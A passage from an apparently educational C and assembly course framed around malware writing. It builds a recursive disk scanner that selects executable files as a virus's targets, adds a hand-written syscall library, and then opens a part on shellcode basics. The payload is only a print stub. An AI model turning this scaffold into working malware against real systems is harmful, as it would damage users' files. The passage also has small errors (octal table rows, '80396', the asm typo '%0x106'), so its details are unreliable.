| But. Wait a minute!. Those numbers look a bit weird isn't it? 118 | 119 | # Base 8, octal numbers 120 | So far we have been using decimal numbers (using base 10) and also hexadecimal numbers (using base 16). OK, true, and binaries (using base 2). However there is another base that is useful when working with computers. This is base 8 and the numbers represented in this base are said to be in octal format. 121 | 122 | In C, you can write octal numbers just adding a `0` at the beginning of the number, the same way that we add a `0x` to represent an hexadecimal value. Octal representation is useful when we need to manipulate blocks of 3 bits (0 to 7.... that's eight values, hence octal). So, let's try to understand the values of the constants used by `stat`. 123 | 124 | To understand how this matches to the hexadecimal representation, let's just count using both bases: 125 | 126 | HEX OCT BIN 127 | 0 0 0000 0000 128 | 1 1 0000 0001 <-- 129 | 2 2 0000 0010 <-- 130 | 3 3 0000 0011 131 | 4 4 0000 0100 <-- 132 | 5 5 0000 0101 133 | 6 6 0000 0110 134 | 7 7 0000 0111 135 | 8 10 0000 1000 136 | 9 11 0000 1001 <-- 137 | A 12 0000 1010 <-- 138 | B 13 0000 1011 139 | C 14 0000 1100 <-- 140 | D 15 0000 1101 141 | F 16 0000 1110 142 | 10 17 0000 1111 143 | 11 21 0001 0000 144 | 145 | As you can see, when using the octal representation, the first digit of our number is actually the value of the lower 3 bits of the number. Each position in the number, represents the next 3 bytes, so the octal representation is very useful when we need to work with blocks of 3 bits, instead of 4 (we use hexadecimal in those cases). 146 | 147 | For instance, check this out. Hopefully it will look familiar to you: 148 | 149 | chmod 777 afile 150 | 000 111 111 111 -> 0777 151 | 0001 1111 1111 -> 0x1ff 152 | 153 | Both number `0x1ff` and `0777` are the same number (511 in decimal), but the octal representation allows us to write the digits as groups of three bits. In this case, each bit represent the execution, read and write permissions for the file. Imagine to use `chmod` with the decimal or hexadecimal numbers... It would be very tricky to change permissions of a file like that. 154 | 155 | Anyhow and summing up, octal representation is used here and there whenever it is convenient to access the bits in a number in groups of three and not four. And one of these cases is the file permissions. 156 | 157 | # Back to the `st_mode` constants 158 | Now, we can look again to the `st_mode` constants: 159 | 160 | ```C 161 | #define __S_IFMT 0170000 /* These bits determine file type. */ 162 | 163 | /* File types. */ 164 | #define __S_IFDIR 0040000 /* Directory. */ 165 | #define __S_IFCHR 0020000 /* Character device. */ 166 | #define __S_IFBLK 0060000 /* Block device. */ 167 | #define __S_IFREG 0100000 /* Regular file. */ 168 | #define __S_IFIFO 0010000 /* FIFO. */ 169 | #define __S_IFLNK 0120000 /* Symbolic link. */ 170 | #define __S_IFSOCK 0140000 /* Socket. */ 171 | 172 | /* Protection bits. */ 173 | 174 | #define __S_ISUID 04000 /* Set user ID on execution. */ 175 | #define __S_ISGID 02000 /* Set group ID on execution. */ 176 | #define __S_ISVTX 01000 /* Save swapped text after use (sticky). */ 177 | #define __S_IREAD 0400 /* Read by owner. */ 178 | #define __S_IWRITE 0200 /* Write by owner. */ 179 | #define __S_IEXEC 0100 /* Execute by owner. */ 180 | ``` 181 | 182 | Let's first figure out the structure of this field. Representing the different octal values as bit masks. You can check the table in the previous section to verify the values, but we just use blocks of 3 bits.... 183 | 184 | 001 111 000 000 000 000 -> __S_IFMT (0170000) 185 | 000 100 000 000 000 000 -> __S_IFDIR (0040000) 186 | 000 010 000 000 000 000 -> __S_IFCHR (0020000) 187 | 000 110 000 000 000 000 -> __S_IFBLK (0060000) 188 | 001 000 000 000 000 000 -> __S_IFREG (0100000) 189 | 000 001 000 000 000 000 -> __S_IFIFO (0010000) 190 | 001 010 000 000 000 000 -> __S_IFLNK (0120000) 191 | 001 100 000 000 000 000 -> __S_IFSOCK (0140000) 192 | ^ ^^^ 193 | 000 000 100 000 000 000 -> __S_ISUID (0004000) 194 | 000 000 010 000 000 000 -> __S_ISGID (0002000) 195 | 000 000 001 000 000 000 -> __S_ISVTX (0001000) 196 | ^^^ 197 | 000 000 000 100 000 000 -> __S_IREAD (0000400) 198 | 000 000 000 010 000 000 -> __S_IWRITE (0000200) 199 | 000 000 000 001 000 000 -> __S_IEXEC (0000100) 200 | ^^^ 201 | 202 | As we can see the `__S_IFMT` is a mask to extract the high bits from the field that identify the type of file. Also note how the constant for the types of files have been defined as high numbers so we can compare directly just after ANDing the mask. 203 | 204 | After the type of file, we find the special file attributes that indicates if the file is _SetUID_ or _SetGUID_ and also if the sticky bit is activate. And after that follows the file permissions for the owner, the group and the rest of users. 205 | 206 | Yes, you are right, `bits/stat.h` only defines the mask for the owner. Actually, the constant defined above shouldn't be used by normal programs, we should use the ones redefined in `sys/stat.h`. I will include them here for you to check them out: 207 | 208 | ```C 209 | /* Protection bits. */ 210 | 211 | #define S_ISUID __S_ISUID /* Set user ID on execution. */ 212 | #define S_ISGID __S_ISGID /* Set group ID on execution. */ 213 | 214 | #define S_IRUSR __S_IREAD /* Read by owner. */ 215 | #define S_IWUSR __S_IWRITE /* Write by owner. */ 216 | #define S_IXUSR __S_IEXEC /* Execute by owner. */ 217 | /* Read, write, and execute by owner. */ 218 | #define S_IRWXU (__S_IREAD|__S_IWRITE|__S_IEXEC) 219 | 220 | #define S_IRGRP (S_IRUSR >> 3) /* Read by group. */ 221 | #define S_IWGRP (S_IWUSR >> 3) /* Write by group. */ 222 | #define S_IXGRP (S_IXUSR >> 3) /* Execute by group. */ 223 | /* Read, write, and execute by group. */ 224 | #define S_IRWXG (S_IRWXU >> 3) 225 | 226 | #define S_IROTH (S_IRGRP >> 3) /* Read by others. */ 227 | #define S_IWOTH (S_IWGRP >> 3) /* Write by others. */ 228 | #define S_IXOTH (S_IXGRP >> 3) /* Execute by others. */ 229 | /* Read, write, and execute by others. */ 230 | #define S_IRWXO (S_IRWXG >> 3) 231 | ``` 232 | 233 | I had removed a couple of lines to make easier reading the file. Here you can see how all constants are redefined, and the group and other permissions are just redefined as shifted versions of the original user masks we have just seen. 234 | 235 | > NOTE: The `>>` operator shifts all the bits of the left hand operand to the right as many positions as the right hand operand indicates. `S_IRUSR >> 3` will shift `S_IRUSR` value 3 positions to the right. In this case: `S_IRUSR = __S_IREAD = 0000400` shifting this three positions to the right will produce `040` (remember octal digits works on groups of 3 bits). 236 | 237 | Well, this has been a kindof a digression, but this concepts are usually confusing for the beginners and I though it would be great to add some explanation in the course, 238 | 239 | # Back to our `select_target` 240 | 241 | So, know we can modify our `select_target` to find the kind of files we are interested on. This is how the new function will look like: 242 | 243 | ```C 244 | int select_target (PAYLOAD_FUNC pf) { 245 | char buf[BUF_SIZE]; 246 | struct linux_dirent *de; 247 | struct stat st; 248 | int fd, n, i; 249 | 250 | if ((fd = open (folder, O_RDONLY | O_DIRECTORY)) < 0) MFW_EXIT("open:"); 251 | 252 | while (1) { 253 | n = getdents (fd, buf, BUF_SIZE); 254 | if (n < 0) MFW_EXIT ("getdents:"); 255 | if (n == 0) break; 256 | 257 | for (i = 0; i < n;) { 258 | de = (struct linux_dirent *)(buf + i); 259 | 260 | if ((fstatat (fs, de->d_name, &st)) < 0) { 261 | perror ("stat:"); 262 | continue; // Just ignore the error 263 | } 264 | if (((st.st_mode & S_IFMT) == S_IFREG) 265 | && (st.st_mode & 00111)) 266 | pf (target); 267 | 268 | i += de->d_reclen; 269 | 270 | } 271 | } 272 | done: 273 | close (fd); 274 | return 0; 275 | } 276 | ``` 277 | 278 | Two comments on this code: 279 | 280 | 1. We have used `fstatat` instead of `fstat` or `stat`, so we do not have to build the full path to the file before calling `stat`. This syscall uses the directory file descriptor as base and tried to look for the file **AT** the directory that we pass as first parameter. In this case it is very convenient and we avoid allocating memory for strings and concatenating them. 281 | 2. This is the `select_target` for a virus. We are checking that the directory entry is a regular file (`S_IFREG`) and then we check that it is executable. In this case we are just checking for all possible executable permissions but that may be different in a real case. 282 | 283 | The permission checking could also be written like: 284 | 285 | ```C 286 | st.st_mode & 00111; // Is the same than 287 | st.st_mode & (S_IXUSR|S_IXGRP|S_IXOTH) 288 | ``` 289 | 290 | Second one is better as you can easily see what we are comparing to... and the generated code would be the same... But first one is shorter and I chose that. 291 | 292 | Now, you can try to change the program to look for other kind of files as it my happen in the case of ransomware or spyware. But you need a last piece of knowledge in order to be able to complete the implementation of `select_target`. 293 | 294 | # Recursive functions 295 | The problem with our current `select_target` is that, it can only scan a single directory. In general, we should be able to scan the whole disk, that means that, we need to modify the function so, each time we find a directory, we also scan it. Or in other words, each time we find a directory we need to call ourselves again with the new directory name to scan. 296 | 297 | A function that call itself is known as a recursive function. Recursive functions are very powerful and usually allows us to write very small and elegant code to deal with complex problems. A classical example is traversing a tree. It is way easier to do it with a recursive function that with normal iterative code. 298 | 299 | In general, recursive function trades code complexity with memory usage. That is normal, we always trade either speed, memory or complexity. That's life. A recursive function will make extensive use of the stack creating stack frames again and again each time it calls itself. But other than that they are neat solutions to many problems, and usually requires way less code that an iterative solution. 300 | 301 | _NOTE:The old BASIC programming language in the first microcomputer in the 80 didn't have a stack. They have the concept of subroutine but lacking a stack, you couldn't call a function recursively. That together with the design of the language was the cause of a lot of [spaguetti code](https://en.wikipedia.org/wiki/Spaghetti_code) in the programs at that time._ 302 | 303 | # A recursive `select_target` 304 | So, it's time to modify our program to be able to scan the whole disk. For that we will need to modify the function signature, so we get the current folder being scanned in the stack frame of our function and we can continue our work at the right place after processing every subfolder. 305 | 306 | We will also add some messages and some indention to the function, for easily check that your function is working fine: 307 | 308 | 309 | ```C 310 | 311 | int level = 0; 312 | char tabs[1024]; 313 | 314 | int payload (char *target) { 315 | printf ("%s Doing malware things to %s\n", tabs, target); 316 | } 317 | 318 | int select_target (int old_fd, char *folder, PAYLOAD_FUNC pf) { 319 | char buf[BUF_SIZE]; 320 | int flag = 1; 321 | struct linux_dirent *de; 322 | struct stat st; 323 | int fd, n, i; 324 | 325 | // Scan directory 326 | 327 | // Open directory using open 328 | printf ("%s Processing : %s\n", tabs, folder); 329 | if ((fd = openat (old_fd, folder, O_RDONLY | O_DIRECTORY)) < 0) MFW_EXIT("open:"); 330 | // Update indentation string 331 | tabs[level] = ' '; 332 | level ++; 333 | 334 | while (flag) { 335 | n = getdents (fd, buf, BUF_SIZE); 336 | if (n < 0) MFW_EXIT ("getdents:"); 337 | if (n == 0) break; 338 | 339 | // Build file name 340 | for (i = 0; i < n;) { 341 | de = (struct linux_dirent *)(buf + i); 342 | if ((fstatat (fd, de->d_name, &st, 0)) < 0) { 343 | perror ("stat:"); 344 | continue; // Just ignore the error<- This is a bug can you fix it? 345 | } 346 | if (((st.st_mode & S_IFMT) == S_IFREG) 347 | && (st.st_mode & 00111)) 348 | pf (de->d_name); 349 | else if (((st.st_mode & S_IFMT) == S_IFDIR) 350 | && !(de->d_name[0] == '.' 351 | && (de->d_name[1] == 0 352 | || (de->d_name[1] == '.' && de->d_name[2]==0)))) 353 | select_target (fd, de->d_name, pf); 354 | 355 | i += de->d_reclen; 356 | } 357 | } 358 | // Remove indentation 359 | tabs[level] = 0; 360 | level--; 361 | close (fd); 362 | return 0; 363 | } 364 | ``` 365 | 366 | Despite the indentation thingy (we just add a space to a string every time we enter the function and remove it every time we left), there are two main changes: 367 | 368 | ```C 369 | if ((fd = openat (old_fd, folder, O_RDONLY | O_DIRECTORY)) < 0) MFW_EXIT("open:"); 370 | ``` 371 | 372 | We have changed `open` for `openat`. This works the same than `statat`, we just pass as first parameter a file descriptor and, if the second parameter (the `pathname`) is relative it will open the file from the indicated directory, otherwise, if the path is absolute, will behave like a normal open. 373 | 374 | This is convenient so we do not need to build the full file name ourselves. That is not a big deal (`strcpy`+ `strcat`), but this way we do not have to. 375 | 376 | The second change is the recursive call. Basically, we just need to check if the directory entry is a directory. If that is the case we call ourselves again with the sub-directory name. However, remember the `.` and `..` entries we mentioned in last instalment?.... Sure, you do... well, we need to skip those, otherwise we get into an infinite loop.... This is the rest of the check. 377 | 378 | ```C 379 | if (((st.st_mode & S_IFMT) == S_IFDIR) 380 | && !(de->d_name[0] == '.' 381 | && (de->d_name[1] == 0 382 | || (de->d_name[1] == '.' && de->d_name[2]==0)))) 383 | select_target (fd, de->d_name, pf); 384 | ``` 385 | 386 | So, our `select_target` for malwares that need to look for files is ready. 387 | 388 | # Removing libC 389 | 390 | So, we have been learning a lot about C programming, and we haven't talked much about asm. We will be looking to assembler in the coming instalments, but before starting with that we are going to remove the libc dependencies from our current test program, so we can have full control on the assembler version we are going to generate. 391 | 392 | So far, we are using the following system calls: 393 | 394 | exit 395 | write 396 | openat 397 | close 398 | getdents 399 | fstatat 400 | 401 | So, our first task will be to generate a mini libc version for our program. This is easier than expected: 402 | 403 | ```asm 404 | .global mfw_exit 405 | .global mfw_write 406 | .global mfw_close 407 | .global mfw_openat 408 | .global mfw_newfstatat 409 | .global mfw_getdents 410 | 411 | mfw_write: 412 | mov $0x01, %eax 413 | syscall 414 | ret 415 | 416 | mfw_openat: 417 | mov $0x101, %eax 418 | syscall 419 | ret 420 | 421 | mfw_close: 422 | mov $0x03, %eax 423 | syscall 424 | ret 425 | 426 | mfw_exit: 427 | mov $0x3c, %eax 428 | syscall 429 | ret 430 | 431 | mfw_newfstatat: 432 | mov %rcx, %r10 433 | mov %0x106, %eax 434 | syscall 435 | ret 436 | 437 | mfw_getdents: 438 | mov $78, %eax 439 | syscall 440 | ret 441 | 442 | mfw_open: 443 | mov $0x02, %eax 444 | syscall 445 | ret 446 | 447 | mfw_lstat: 448 | mov $0x06, %eax 449 | syscall 450 | ret 451 | 452 | ``` 453 | 454 | Have you notices something strange?. The implementation of all syscalls is pretty straightforward, except for the `fstatat`. This syscall has a peculiarity. The C ABI and the kernel ABI are different for the forth parameter. C function get that parameter on `RCX` as we already know, but the kernel syscalls expect them on `R10`. I forgot about that and expend quite sometime figuring out why the syscall was failing. 455 | 456 | # The final version 457 | So, this is how the final version will look like: 458 | 459 | ```C 460 | #include 461 | #include 462 | #include // Stat struct 463 | 464 | #define BUF_SIZE 1024 465 | 466 | // XXX: Move this to a .h file 467 | // Dirent Data struct 468 | struct linux_dirent { 469 | long d_ino; 470 | long d_off; 471 | unsigned short d_reclen; 472 | char d_name[]; 473 | }; 474 | 475 | int mfw_getdents (int fd, char *buf, int len); 476 | int mfw_exit (int r); 477 | int mfw_openat(int dirfd, const char *pathname, int flags); 478 | int mfw_newfstatat (int dirfd, char *p, struct stat *st, int flags); 479 | int mfw_close (int fd); 480 | size_t mfw_write(int fd, const void *buf, size_t count); 481 | 482 | #define MFW_EXIT(s) do {mfw_exit (1);} while (0) 483 | 484 | typedef int (*PAYLOAD_FUNC)(char *); 485 | 486 | // Global vars 487 | int level = 0; 488 | char tabs[1024]; 489 | 490 | int mfw_puts (char *s) { 491 | while (*s) mfw_write (1, s++, 1); 492 | } 493 | 494 | // Helper function to write tabbed strings 495 | int mfw_print_tstr (char *s, char *v) { 496 | mfw_puts (tabs); 497 | mfw_puts (s); 498 | if (v) mfw_puts (v); 499 | mfw_puts ("\n"); 500 | } 501 | 502 | int payload (char *target) { 503 | mfw_print_tstr (" ++ Doing malware things to ", target); 504 | } 505 | 506 | int select_target (int old_fd, char *folder, PAYLOAD_FUNC pf) { 507 | char buf[BUF_SIZE]; 508 | struct linux_dirent *de; 509 | struct stat st; 510 | int fd, n, i; 511 | 512 | tabs[level] = ' '; 513 | level ++; 514 | 515 | mfw_print_tstr (">> Entering ", folder); 516 | 517 | if ((fd = mfw_openat (old_fd, folder, O_RDONLY | O_DIRECTORY)) < 0) goto clean; 518 | 519 | while (1) { 520 | n = mfw_getdents (fd, buf, BUF_SIZE); 521 | if (n < 0) continue; // Silently ignore errors 522 | if (n == 0) break; 523 | 524 | for (i = 0; i < n;) { 525 | de = (struct linux_dirent *)(buf + i); 526 | if ((mfw_newfstatat (fd, de->d_name, &st, 0)) < 0) goto next; 527 | 528 | if (((st.st_mode & S_IFMT) == S_IFREG) && (st.st_mode & 00111)) 529 | pf (de->d_name); 530 | else if (((st.st_mode & S_IFMT) == S_IFDIR) 531 | && !(de->d_name[0] == '.' 532 | && (de->d_name[1] == 0 533 | || (de->d_name[1] == '.' && de->d_name[2]==0)))) 534 | select_target (fd, de->d_name, pf); 535 | next: 536 | i += de->d_reclen; 537 | } 538 | } 539 | clean: 540 | mfw_print_tstr ("<< Leaving ", folder); 541 | tabs[level] = 0; 542 | level--; 543 | mfw_close (fd); 544 | return 0; 545 | } 546 | 547 | int main (int argc, char *argv[]) { 548 | for (int i = 0; i < 1024; tabs[i++] = 0); 549 | while (select_target(0, argv[1], payload)); 550 | } 551 | 552 | ``` 553 | 554 | As I did last time. This version has a few updates that I haven't described in the text. Try to understand what they are for and do not hesitate to ask your questions in case you cannot figure it out by yourself. 555 | 556 | I named the asm code in previous section `minilibc.S`. So, in order to compile my program I have to do: 557 | 558 | gcc -o select_files select_file.c minilibc.S 559 | 560 | # Conclusion 561 | We have now working code to scan a disk and test some basic file information as the type of file and the permissions. We have also learned how to navigate the system include files to find out the information we need and also how to master the octal numeric representation. 562 | 563 | We have removed the libC dependencies and we are ready for a asm implementation. We will find out if that asm implementation worth the extra effort, and after that we will be ready to get started with some simple payload.... 564 | -------------------------------------------------------------------------------- /part-03.md: -------------------------------------------------------------------------------- 1 | # Programming for Wannabees. Part III. Your first Shell Code 2 | 3 | Let's go on with our special ASM/C programming course. At this point, we roughly know how a computer works, its main components, what is machine code, what is assembly code and how to compile simple programs for a few architectures. 4 | 5 | In this part we are going to write our first shellcode. Yes, we are that advanced. But, before we get there, we will be exploring a few more new concepts. Let's start. 6 | 7 | # Processor Native Word Size 8 | In this part we will start dealing with stuff bigger than 1 byte, and to understand what is going on, we need to introduce the _Processor Native Word Size_. In a sense, you already know what it means. Whenever you talk about 32bits and 64bits processors/programs... well, that is the processor native word size. 9 | 10 | However, beyond being the type of Linux distribution you choose to install, this value has some low level implications: 11 | 12 | * This value is the native size of the processor registers. Do you remember the registers within the processor?. Sure you do. So, a 32 bits processor have 32bits registers and a 64bits processor have 64bits registers. This is not completely accurate but, for now, just consider this size as the one the processor is comfortable with. 13 | * This value is usually also the width of the data bus. 14 | * And, it is usually also the width of the address bus... 15 | 16 | Overall, and without going into the electronics within the processor, what you need to know is that each processor is optimised to work with its native word size. This way, a 32bits processor will perform arithmetic operations or access memory faster when it deals with a 32bits long value that when it deals with a 16bits long value. I know, this is a bit contra-intuitive and a bit of an act of faith but it will be very long and tedious to go through the details to understand this. Actually I'm not sure I could successfully guide you through that path. 17 | 18 | To further illustrate this, below is a fragment of the "Intel's 80396 Programmers's Reference Manual" from 1986 (http://microsym.com/editor/assets/386intel.pdf). You can find it in section 2.2 "Data Types" page 24. 19 | 20 | 21 | > Note that words need not be aligned at even-numbered addresses and 22 | > doublewords need not be aligned at addresses evenly divisible by four. This 23 | > allows maximum flexibility in data structures (e.g., records containing 24 | > mixed byte, word, and doubleword items) and efficiency in memory 25 | > utilization. When used in a configuration with a 32-bit bus, actual 26 | > transfers of data between processor and memory take place in units of 27 | > doublewords beginning at addresses evenly divisible by four; however, the 28 | > processor converts requests for misaligned words or doublewords into the 29 | > appropriate sequences of requests acceptable to the memory interface. Such 30 | > misaligned data transfers reduce performance by requiring extra memory 31 | > cycles. For maximum performance, data structures (including stacks) should 32 | > be designed in such a way that, whenever possible, word operands are aligned 33 | > at even addresses and doubleword operands are aligned at addresses evenly 34 | > divisible by four. Due to instruction prefetching and queuing within the 35 | > CPU, there is no requirement for instructions to be aligned on word or 36 | > doubleword boundaries. (However, a slight increase in speed results if the 37 | > target addresses of control transfers are evenly divisible by four.) 38 | 39 | 40 | 41 | Summing up, try to program your processor using its native word size. It may look that you are wasting some space, but that is the right way to do it. 42 | 43 | I will just give a small hint on this topic before going on. 44 | 45 | 46 | # An Example: Processor Word Size and Memory. 47 | We have just said in the previous section that a 32bits processor will operate faster on a 32bit value and will also access faster a 32bits value in memory than a 16 bits one. 48 | 49 | The first thing you can infer from that sentence is that, even if the smaller addressable value in memory is 8 bits (do you remember the size of our memory drawers from Part I?), a 32bits processor can read 32bits from memory at once. 50 | 51 | This simple sentence has quite some concepts behind it. Let's go one by one 52 | 53 | ## Simplified Memory Hardware Model 54 | The memory system in a PC can be quite elaborated and it is beyond the scope of this course to go into those details, however, discussing a simplified model of the system memory will be beneficial for us. 55 | 56 | In its simplest way, a memory chip provides the following pins... 57 | 58 | - `AX` pins usually known as Address pins (with X=0...WordSize) 59 | - `DX` pins usually known as Data pins (with X=0...WordSize) 60 | - `Cx` pins usually know as Control pins. (depends on the processor) 61 | 62 | The CPU also have similar `AX` and `DX` pins that are connected to the memory. This connection is not direct (we really need a bus between them), but for this simplified model we can consider that they are directly connected. 63 | 64 | The control pins allows the _Processor_ to command the memory. In this group you will usually find: 65 | 66 | - `OE/CS` (Output Enable, Chip Select). These pins will, in a sense, _ACTIVATE_ the memory chip (either the input or the output). 67 | - `WR/RD` (Wrtite, Read). These ones are used to tell the memory if we want write into the memory or to read values from it. 68 | 69 | So, whenever the CPU wants to read a value from the memory, it puts the value of the address to access in its address pins (`AX`) which are connected to the memory `AX` pines, usually by a bus. Then, the right control signal are exercised in the memory chip, and it will put in its `DX` pins the value in the memory address indicated by `AX`. 70 | 71 | OK, let's put some numbers to better understand this: 72 | 73 | ----+ +----------- 74 | +- A0 --------------- A0 -+ 75 | +- ... -------------- ... -+ 76 | CPU +- A31--------------- A31 -+ Memory 77 | +- ... | 78 | +- D0 ---------------- D0 -+ 79 | +- ... -------------- ... -+ 80 | +- D31 -------------- D31 -+ 81 | ----+ +------------ 82 | 83 | Imagine that the `RIP` register (do you remember the Instruction Pointer?), is pointing to address 4, so, the instruction on address 4 is the next one to execute. The CPU has to read from memory that instruction, so it puts in the address bus the value 84 | 85 | 1098765432109876543210 86 | 33222222222211111111119876543210 87 | -------------------------------- 88 | 00000000000000000000000000000100 89 | 90 | Only pin `A2` will be set. That actually means address 4. So, these pins are also connected to the memory. Whenever the `RD` control signal is activated in the memory, the chip will access address 4 and put in `D0` to `D31` the value stored at that position.... Remember this is a simplified model... a lot more things goes on when accessing memory. 91 | 92 | Then, the memory will put the value of address 4 in `D0-D7`. As each memory position is 8 bits, we only need 8 physical pins to send the value to the CPU. What happens is that is a huge waste. In general, the memory, will not put only 1 byte in the `Dx` lines, it will put as much as it can... in this example it means that it will output 4 bytes, starting from address 4, using the 32 `Dx` signals in the bus. 93 | 94 | _Again, this is a simple example. Some times, your memory only has a data bus 8 bits long and multiple memory chips are used to access 16, 32 or 64 bits words... in those cases, there is a real physical constraint with regards to memory aligned accesses. This little things are the ones that makes a difference between two systems._ 95 | 96 | 97 | ## CPU Native Word Size 98 | As you can imagine by now, there is a relation between the processor and the rest of the computer with regards to this native word size. A 32bits processor will interface to a _32bits memory system_ (is not that straightforward, but roughly that is what happens and, when it says _system_ it may actually be saying several chips). 99 | 100 | Now, imagine that you want to just read a byte. You put your address in the `Ax` lines and ask the memory chip to spit the content of that address. The memory chip will put in the `Dx` the content of that address you request plus the 3 next addresses. The CPU will then read those 4 bytes from the bus and... just get the lower 8 bits from that value. In a sense, that requires something extra to do than just reading the whole 32bits value into our 32bits register. You see what I mean? (in this case it is just discarding 3 out of the 4 bytes) 101 | 102 | This becomes a bit more tricky if instead of a 32 bits memory chip you use four 8 bits memory chips. For instance, check Intel processors datasheet. From the 80386 and on you will see that the lower bits of the data bus are nor directly mapped to these `AX` pins. You have to look for `BE#X` pins or `REQ#X` depending on the processor version. 103 | 104 | As you can see, what I had described is just a very simplified example to illustrate how a processor works in a more efficient way when it only has to deal with its native internal word size. The reality is more complex and unless you need to design your own computer (the motherboard at least), it does not really matter (specially with the large cache memory nowadays). 105 | 106 | 107 | ## Little/Big Endian 108 | So, now, we'll always try to read data from memory using the native word size of our processor (not really but the compiler will do that for us). Let's assume the native word size is 4 bytes (32bits processor). The question now is: How are those bytes mapped between the memory and our registers?. 109 | 110 | Let's assume the following memory layout: 111 | 112 | 113 | | ... | Drawer ... 114 | +--------+ 115 | | 0x44 | p + 3 116 | +--------+ 117 | | 0x33 | p + 2 118 | +--------+ 119 | | 0x22 | p + 1 120 | +--------+ 121 | | 0x11 | p 122 | +--------+ 123 | 124 | Let's assume too, that we want to read the content of address `p`, in register `eax`. Which value do you think you will get in the `eax` register? 125 | 126 | `0x44332211` or `0x11223344` 127 | 128 | The answer is: it depends. It depends on your processor. If your processor is `Little Endian` you will get the first value. Otherwise, if your processor if `Big Endian` you will get the second value. We have met the `Endianness`. 129 | 130 | In general, you do not care about your processor Endianness. You just write and read your values to/from memory and the processor will do the right thing. Endianness becomes important when you have to interchange data with computers that may have a different endianness. This happens very often in network programming when using Open protocols that have to work with any kind of machine. 131 | 132 | Enough introduction. Let's see how all this concepts can be of any practical use. 133 | 134 | # Pointers 135 | LoL. You may be thinking: _OMG!, this guy is gonna kill me. Everybody says that pointers are the most tricky part of C programming and he is just starting with this. Really, man, I give up_. 136 | 137 | OK guys. Do not give up. You will see, in a sec that this is a lot simpler that you think. Furthermore, if you are doing assembly programming... well, you cannot do much without using pointers.... Just repeat to yourself: I have to go through this to finally understand those shellcodes everybody talks about... Repeated again... again... are you ready now? 138 | 139 | So, what is a pointer again?. A pointer is just a position of memory that contains the address of another position of memory. :dizzy_face: 140 | 141 | The first thing you may figure out from that cryptic recursive definition is that, a pointer have to have a size equal to the number of `Ax` pines in the processor. In other words, it has to have the size of the address bus of the processor. 142 | 143 | In plain words. A 32bits processor with a 32bits address bus (i.e a intel 386) will require 32bits to store any potential memory address any program can ever reference. The same for a 64bits processor with a 64bits address bus, a pointer will need 8 bytes to reference any possible memory address. In this last case, for a 64bits processor, we need 8 bytes to cover possible value the processor can output in the address bus (the so-called addressing space) and therefore a pointer is stored in 8 consecutive address positions. (Again, this can become a bit more complicated in reality, but this concept is enough for now). 144 | 145 | Let's see this with an example. Imagine the following memory layout: 146 | 147 | 148 | | ... | p + 4 = 0x400004 149 | +--------+ 150 | | 0x40 | p + 3 = 0x400003 151 | +--------+ 152 | | 0x00 | p + 2 = 0x400002 153 | +--------+ 154 | | 0x00 | p + 1 = 0x400001 155 | +--------+ 156 | | 0x04 | p = 0x400000 157 | +--------+ 158 | 159 | The example above show a 32bits pointer at address (0x400000) pointing to address 0x400004 on a 32bits little endian machine. A memory address storing a memory address. 160 | 161 | # Hello World 162 | _"Fine, all that stuff is really confusing. Give me an example to understand what you are talking about..."_ Sure, there you go, the _Hello World_ program. 163 | 164 | I'm pretty sure you know the "Hello World" program, but in case you don't, this is a very simple program that shows the message "Hello World" in the console. 165 | 166 | The way to do this on Linux is to write to the **standard output** (the console). The standard output is known by the system as the file descriptor `1` for any process... We will go in detail on file descriptors later in the course, for now, you just need to know that if you pass `1` as first parameter to the system call `write` you will be writing to the console. 167 | 168 | So, knowing that the `write` system call is known by Linux as 1 (on a x86_64 arch), and applying everything we have already learn, this is how our little program will look like: 169 | 170 | ```nasm 171 | global _start 172 | _start: mov rax, 1 ; SYS_write = 1 173 | mov rdi, 1 ; fd = 1 174 | mov rsi, msg ; buf = msg 175 | mov rdx, 13 ; count = 13 (the number of bytes to write) 176 | syscall ; (SYS_write = rax(1), fd = rdi (1), buf = rsi (msg), count = rdx (13)) 177 | 178 | ;; Exit program 179 | mov rax, 0x3c ; SYS_exit = 0x3c 180 | mov rdi, 0 ; status = 0 181 | syscall ; (SYS_exit = rax (0x3c), status = rdi (0)) 182 | 183 | msg: db 'Hello World!',0x0a 184 | ``` 185 | 186 | I hope you can identify the two system calls in there. The first one to write the message, and the second one to exit the program with status 0. If you do not know how to compile the program, you need to go back and check Part I of this course. 187 | 188 | # Labels and Assembler commands 189 | There are two new elements in our tiny program. The first one is a label. A label is a name we can use to reference a part of our program (actually a memory position). In this case, the label `msg` is used to reference some data in memory, our "Hello World" message. In general, we do not know where in memory our program will be loaded, so using symbolic names let us write our programs without caring about that. Even if we use offsets to reference memory positions independently of our actual location in memory, labels will let us ask the compiler to calculate those offsets for us. 190 | 191 | Actually, we've already seen this in the past.... can you spot the label we have been using so far? ... Anybody `_start`? 192 | 193 | The second thing is that `db` instruction on the program. That is not a processor opcode, but an assembler instruction. Assembler instructions are only understood by the assembler, and does not directly translate into opcodes in the program. We already know one of those assembler instructions... Yes `global`. 194 | 195 | The `db` assembler instruction probably stands for `Data Byte` (TBH I do not know for sure). It allows us to set some memory area with a sequence of bytes. In this case we can see two parts in the `db` instruction. The first part is a string. The assembler will output one byte per char starting at position `msg`. Then we can see an extra byte, separated by a comma, and expressed in hexadecimal. Sure, you can just put the decimal value (`10`) there and everything will stay the same. You can also write your string as a list of the ASCII values for each character separated by commas... but that is not very practical. 196 | 197 | So, in this little program, where is our pointer?. We said that a pointer is a memory address that contains a memory address. In this case, the memory address is actually a register, specifically the register `rsi`. Do you remember that we said registers are just very fast memory within the processor that are referenced by a name?... well, if you are more comfortable changing the definition above to specifically also talk about registers that's fine. Anyway, I hope you have seen the point... er! ;) 198 | 199 | # A C version 200 | Let's now try to write the C version for this program. It would look like this: 201 | 202 | ```C 203 | #include 204 | 205 | int main () 206 | { 207 | register void *p = "Hello World!\n"; 208 | write (1, p, 13); 209 | _exit (0); 210 | } 211 | 212 | ``` 213 | 214 | Again, we can easily identify the two system calls in the program ( `write` and `_exit`). We already know that the second parameter to write has to be a pointer, a memory address containing the address, in memory, to the string to print. Let's take a look to the assembly generated by `gcc`: 215 | 216 | 217 | $ objdump -d -M intel hello 218 | (...) 219 | 0000000000400544
